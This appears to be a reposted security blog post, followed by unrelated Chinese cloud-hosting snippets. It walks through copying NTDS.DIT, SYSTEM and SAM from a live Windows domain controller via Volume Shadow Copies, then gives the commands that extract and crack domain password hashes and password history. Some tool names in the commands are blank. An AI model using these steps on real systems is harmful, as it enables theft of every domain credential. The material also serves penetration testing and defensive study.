Safely Dumping Hashes from Live Domain Controllers-阿里云开发者社区

开发者社区> cnbird> 正文

Safely Dumping Hashes from Live Domain Controllers

简介:   UPDATE: See

UPDATE: See for updated information.

Recently, Mark Baggett and I presented material on some research we've been conducting for several months in a talk called "Lurking in the Shadows". The basis of the talk and the purpose for our research is that there are some really cool things you can do with Volume Shadow Copies in modern Windows Operating Systems. Our talk takes the approach of using Shadow Copies for hiding malware on Windows systems, but Mark mentions during the talk how one can access protected system files through Shadow Copies as well.

The day after we first presented "Lurking in the Shadows" at Hack3rCon II, Matt Graeber (@mattifestation) reached out to me and asked if I'd ever tried to take the SAM, SYSTEM hive or NTDS.DIT files from a live system using this technique. At the time, I hadn't. So, I immediately fired up my Windows 7 box, created a Shadow Copy with VSSOwn, and attempted to copy the SAM and SYSTEM hive files directly from the Shadow Copy. To my surprise, the 2 files copied without any non-readable errors! I guess I knew it would be possible, as Mark and I were already beating around this bush, but this meant something bigger. Something huge. Was it now possible to dump the NTDS.DIT and SYSTEM hive files from a LIVE domain controller for offline hash dumping? I quickly promoted one of my 2008 Servers to a DC, psexec'd a meterpreter shell to it and took a shot at the NTDS.DIT file with VSSOwn. The file copied out of the Shadow Copy without issue.

So it appears that Mark and I have uncovered some interesting stuff here. You can access anything that is supposed to be locked down and protected on a Windows system by accessing them through Shadow Copies. I can only imagine how we are going to begin seeing this used in the wild and I'm interested to see what others come up with.

But wait a sec. I still don't have hashes. All I have is the SYSTEM hive and the NTDS.DIT file. What can we do with these? Well, up until recently, nothing for free. No one had built a free, open source tool for parsing NTDS.DIT files and decrypting the hashes. But during my quest to find something, Jeremy Pommerening tweeted a link to this white paper. In brief, a security researcher named Csaba Barta took some existing tools and modified them to parse through the NTDS.DIT file and extract the hashes from it. Awesome! The link is complete! I combined Mark and my technique with Csaba's tools and here is the result:

1. Create a new Shadow Copy.
cscript vssown.vbs /start (optional)
cscript vssown.vbs /create

2. Pull the following files from a shadow copy:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

3. Copy files to BT5R1.

2. Download tools from:

3. Configure and Make the source code for libesedb from the extracted package.
cd libesedb
chmod +x configure
./configure && make

4. Use esedbdumphash to extract the datatable from ntds.dit.
cd esedbtools
./esedbdumphash ../../ntds.dit

5a. Use to dump the hashes from the datatable using the bootkey from the SYSTEM hive.
cd ../../creddump/
python ./ ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable

5b. Use bkhive and samdump2 to dump the hashes from the SAM file using the bootkey from the SYSTEM hive.
bkhive SYSTEM key.txt
samdump2 SAM key.txt

6. Crack the hashes.

Beautiful right? But we're not done yet. Csaba also created a tool called which dumps the PAST hashes of all the users as well. Now you can crack the historical passwords of users and identify patterns in their password history.

python ./ ../system ../libesedb/esedbtools/ntds.dit.export/datatable

So what exactly does this mean? No more dangerous LSSAS injection to dump domain hashes and no more drive mounting to access locked and protected system files. This is just plain awesome! Huge props to Csaba Barta for the tools and kick ass white paper, Matt Graeber for the idea (and everything else it seems like recently), and dakykilla for providing the files I needed to test all this stuff. You guys rock!


如果在创建实例时没有设置密码,或者密码丢失,您可以在控制台上重新设置实例的登录密码。本文仅描述如何在 ECS 管理控制台上修改实例登录密码。
7251 0
在应用中,有时会遇到用户询问如何使单台云服务器具备多个公网IP的问题。 具体如何操作呢,有了NAT网关这个也不是难题。
25920 0
11029 0
虽然0.0.0.0/0使用非常方便,但是发现很多同学使用它来做内网互通,这是有安全风险的,实例有可能会在经典网络被内网IP访问到。下面介绍一下四种安全的内网互联设置方法。 购买前请先:领取阿里云幸运券,有很多优惠,可到下文中领取。
11676 0
windows server 2008阿里云ECS服务器安全设置
最近我们Sinesafe安全公司在为客户使用阿里云ecs服务器做安全的过程中,发现服务器基础安全性都没有做。为了为站长们提供更加有效的安全基础解决方案,我们Sinesafe将对阿里云服务器win2008 系统进行基础安全部署实战过程! 比较重要的几部分 1.
8123 0
腾讯云服务器 设置ngxin + fastdfs +tomcat 开机自启动
在tomcat中新建一个可以启动的 .sh 脚本文件 /usr/local/tomcat7/bin/ export JAVA_HOME=/usr/local/java/jdk7 export PATH=$JAVA_HOME/bin/:$PATH export CLASSPATH=.
4448 0
购买阿里云ECS云服务器后如何登录?场景不同,云吞铺子总结大概有三种登录方式: 登录到ECS云服务器控制台 在ECS云服务器控制台用户可以更改密码、更换系统盘、创建快照、配置安全组等操作如何登录ECS云服务器控制台? 1、先登录到阿里云ECS服务器控制台 2、点击顶部的“控制台” 3、通过左侧栏,切换到“云服务器ECS”即可,如下图所示 通过ECS控制台的远程连接来登录到云服务器 阿里云ECS云服务器自带远程连接功能,使用该功能可以登录到云服务器,简单且方便,如下图:点击“远程连接”,第一次连接会自动生成6位数字密码,输入密码即可登录到云服务器上。
20968 0
阿里云ECS云服务器初始化是指将云服务器系统恢复到最初状态的过程,阿里云的服务器初始化是通过更换系统盘来实现的,是免费的,阿里云百科网分享服务器初始化教程: 服务器初始化教程方法 本文的服务器初始化是指将ECS云服务器系统恢复到最初状态,服务器中的数据也会被清空,所以初始化之前一定要先备份好。
5836 0